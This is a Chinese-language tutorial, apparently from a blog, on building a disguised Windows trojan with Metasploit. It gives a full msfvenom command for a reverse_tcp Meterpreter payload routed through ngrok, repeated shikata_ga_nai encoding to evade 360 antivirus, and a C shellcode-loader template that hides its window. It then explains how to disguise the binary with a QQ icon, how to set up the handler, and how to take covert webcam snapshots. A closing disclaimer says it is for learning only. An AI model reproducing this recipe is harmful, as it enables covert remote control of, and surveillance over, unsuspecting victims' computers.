一. 配置ngrok準備內網穿透

內網穿透的必要性和原理就不用說了，直接說操作。首先到ngrok官網去註冊一個號，國內也有一個sunny ngrok，但是我用了幾次全失敗了，所以推薦國外的，網址是：https://ngrok.com/。

我註冊的時候面臨驗證碼刷不出來，所以建議選擇用github賬號登陸就好。登陸好之後就在kali下載好對應版本的客戶端。下載好之後你需要在kali上用他給你的憑證進行登陸——命令列輸入

./ngrok authtoken （你的憑證字串）。

憑證可以在官網上覆制。

然後接著輸入：

./ngrok tcp 1234

這的1234是你本地的埠，出現如下畫面說明你成功了,然後讓他一直開著。

左邊就是給你用的埠，右邊就是你本地的埠

然後你可以通過ping這個給你的網址得到IP，這個是ping不通的，不過可以得到IP就可以了。這個每次重新穿透的時候都會更換遠端埠，這是比較egg疼的，不過免費嘛，算可以了。

二.木馬的偽裝與簡單免殺

木馬面臨的最基本的問題就是免殺，如果不能免殺，被防毒軟體發現，其作用幾乎為零，至於怎麼感染別人，就得看你的忽悠能力或者USB的方式，但是首要的應該是免殺。

我採用的是比較簡單的免殺方式，依靠msf生成的shellcode免殺。

在命令列輸入：

msfvenom -p windows/meterpreter/reverse_tcp -a x86 --platform windows LHOST=52.14.61.47 LPORT=13098 -e x86/shikata_ga_nai -i 15 -b '\x00\' PrependMigrate=true PrependMigrateProc=svchost.exe -f c > /root/Desktop/shellcode.c
 

這裡的paylload選擇windows/meterpreter/reverse_tcp，LHOST和LPORT分別填ngrok給你的網址和埠，-e x86/shikata_ga_nai -i 15是用-e x86/shikata_ga_nai編碼15次，而PrependMigrate=true PrependMigrateProc=svchost.exe使這個程式預設會遷移到svchost.exe程序，自己測試的時候不建議到這個程序而是其他的持久程序，這樣別人開啟之後就無法再常規的去關閉回連的會話。你還可以使用windows/meterpreter/reverse_tcp_rc4這個payload,對會話進行加密，增加免殺能力。

相信大家都試過，直接輸出exe檔案就算注入其他軟體和進行編碼n遍也會馬上被查殺出來。多次測試發現用x86/shikata_ga_na編碼超過12次以上再通過shellcode編譯出來都能免殺。

如下圖你的桌面會有一個shellcode.c檔案

將其移到 windows,用記事本開啟會有 ：unsigned char buf[] =”一長串數字”

接著就開始編譯木馬，我使用的是vs2015

下載連結：

https://pan.baidu.com/s/1BgxZeCTZoFvpm_lhxcRXCw 密碼：bchi

在visual studio下新建一個c++的win32專案將以下程式碼模板複製進去，在把你得到的shellcode那長串數字複製到shellcode的位置。

#include<stdio.h>#include<windows.h>#pragma comment(linker,"/subsystem:\"windows\" /entry:\"mainCRTStartup\"")                        //去除視窗unsigned char shellcode[]= （這裡就是shellcode）void main(){ LPVOID Memory = VirtualAlloc(NULL, sizeof(shellcode), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE); memcpy(Memory, shellcode, sizeof(shellcode)); ((void(*)())Memory)();}

編譯方法網上有很多種，這個時候已經可以編譯了，但是我們還可以對圖示進行更改偽裝：右擊你的專案-→新增-→資源-→圖示-→新建,再用電腦的搜尋查詢*.icon，找到 QQ的圖示找到你這個專案的資料夾下會有一個1icon.ico檔案，將QQ的圖示改成1icon.ico，拖進去替換掉原來的那個圖示檔案

然後vs平臺就會出現下圖：

這個時候你再編譯出來就會是一個QQ圖示的木馬。具體情況下你可以以此方法任意改圖示再重新命名，使你的木馬更加具有迷惑性。

我們再使用國內普遍的360防毒軟體測試一下效果，證明可以免殺了

只要在不影響shellcode的情況下，你可以對這個程式再增加擴充套件（就看你的c語言功底了），比如這裡使用#pragma comment(linker,”/subsystem:\”windows\” /entry:\”mainCRTStartup\””)隱藏程式視窗，並用這個程式取代快捷方式，再通過這個程式呼叫原來真正的程式基本就神不知鬼不覺了。

其次就是建議各位在測試自己的木馬時一定要關閉雲端上傳功能，360會收集可以軟體，上傳雲端檢測，然後備份通殺，所以你的木馬沒準今天還可以免殺，明天就全國聯保了。心疼被吃的一個馬。

三.meterpreter後滲透功能測試

先配置好監聽端

use exploit/multi/handlerset payload windows/meterpreter/reverse_tcpset LHOST 127.0.0.1set LPORT 1234exploit

注意LHOST和LPORT配置為之前和ngrok繫結的本地的埠!!

然後等待別人執行我們的木馬。如下就是成功了。

然後我讓遠在異地的女友和我的室友幫我測試了一下，結果也是成功的，具體你們也可以試試。這個時候你基本可以操控很多功能了。

但是我又發現360的行為檢測會阻止meterpreter許多功能，簡單的getsystem提權絕對失敗，通過雜湊傳遞和假冒令牌的方式提權，都會被報可疑程式在呼叫驅動，甚至拍照都會報可以程式在呼叫攝像頭（部分電腦不會報）

然後msf會收到一張360的調戲圖：

但是你接著第二次使用：

Webcam_snap 1

又不會報並且拍照成功（很奇怪）

再至於常規的持久化控制命令不是失敗就是會被360查殺

並將我們的木馬曝光（十分危險），而如果嘗試關閉360的程序則其核心程序又無法關閉，又嘗試執行360的解除安裝程式，結果又報可以程式在呼叫360部分檔案，非常惱火。

據說通過刪除系統資料夾就可以解除安裝360了，不過不建議，因為那等於暴露了。

希望這篇文章能夠幫助大家的學習，但是這些技術僅供學習使用，切不可用這些技術做非法的事，合法上網從我做起

以上就是對於msf的簡單利用，我還是一個滲透學習路上的菜鳥，歡迎大家提出過程中的問題，或者為後滲透的問題提供解決辦法和思路，謝謝大家